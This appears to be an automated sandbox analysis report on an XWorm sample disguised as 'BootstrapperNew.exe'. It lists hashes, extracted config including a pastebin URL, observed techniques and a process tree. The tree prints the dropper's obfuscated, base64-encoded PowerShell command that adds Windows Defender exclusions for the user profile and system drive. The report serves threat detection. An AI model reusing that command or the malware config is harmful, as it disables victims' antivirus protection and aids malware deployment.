Analysis
-
max time kernel
16s -
max time network
17s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
04/03/2025, 21:26
Static task
static1
Behavioral task
behavioral1
Sample
BootstrapperNew.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
BootstrapperNew.exe
Resource
win10v2004-20250217-en
General
-
Target
BootstrapperNew.exe
-
Size
2.9MB
-
MD5
ec8002f20ee00ec84138608ebb7d5154
-
SHA1
d77b5dfa71bf3b48e351d69a6b251c21c8650d0d
-
SHA256
9376c048648b422f2e84397e969f9d403a4fa6d30c2aabdaba2880e09761f28f
-
SHA512
3ee7644cea6fef18cc17f8a0a46408bdb2897fa2da7808e5bc8563786f3a529b2c57141123e2d29eaba03061273ca28d3b3d3ae5758089ce2d4d6a992d661487
-
SSDEEP
49152:gUcNWu+5IYryMRbEKRWomDRtL38nmVu4+0R/1nnBsfwGGQCEnNNemNznrYWfym//:gUD15XNRbVRWomDRtrbrNnnsbGQCEnNP
Malware Config
Extracted
xworm
-
Install_directory
%port%
-
install_file
svchost.exe
-
pastebin_url
https://pastebin.com/raw/GMv8QPCE
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x0009000000023d6c-4.dat family_xworm behavioral2/memory/4452-13-0x0000000000D30000-0x0000000000D44000-memory.dmp family_xworm -
Xworm family
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation BootstrapperNew.exe -
Executes dropped EXE 2 IoCs
pid Process 4452 WMI Provider Host.exe 1784 BootstrapperNew.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\WMI Provider Host.exe BootstrapperNew.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BootstrapperNew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3848 powershell.exe 3848 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4452 WMI Provider Host.exe Token: SeDebugPrivilege 3848 powershell.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 4076 wrote to memory of 3848 4076 BootstrapperNew.exe 84 PID 4076 wrote to memory of 3848 4076 BootstrapperNew.exe 84 PID 4076 wrote to memory of 3848 4076 BootstrapperNew.exe 84 PID 4076 wrote to memory of 4452 4076 BootstrapperNew.exe 87 PID 4076 wrote to memory of 4452 4076 BootstrapperNew.exe 87 PID 4076 wrote to memory of 1784 4076 BootstrapperNew.exe 88 PID 4076 wrote to memory of 1784 4076 BootstrapperNew.exe 88
Processes
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"1⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAYQBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAbQBkACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAawBhACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3848
-
-
C:\Windows\WMI Provider Host.exe"C:\Windows\WMI Provider Host.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4452
-
-
C:\Users\Admin\BootstrapperNew.exe"C:\Users\Admin\BootstrapperNew.exe"2⤵
- Executes dropped EXE
PID:1784
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.9MB
MD5f227cdfd423b3cc03bb69c49babf4da3
SHA13db5a97d9b0f2545e7ba97026af6c28512200441
SHA256cb5d6c1ca0aa6232a2d55e14b20ac4a9945a0bd063c57d60a5ed3ae94160e3e8
SHA512b10afd03b02a928545c16fad39a6ae46b68b1e1a2477a6990803ce80008e7161fb2ebc9380ba15a1b074bb436aa34bcd6c94a922933d438b1c22489717e1e10e
-
Filesize
57KB
MD57f4631cc67828fc55d6c8bd1af02bf44
SHA154d6e1c3e0b655d231d461e32d187c0f2338295d
SHA2565361c6e459fd49ee6a11f586c5dd3a2626f1338cdc4ce661287f48966451a6dd
SHA512f931f8bde5aa6c2d528031fd5505eb6a0044edddcd1c5798ef762102e8d59e5701087259258d5cc15fea59e1e199f2c870fa95ad748a8e20680096cc4d62c348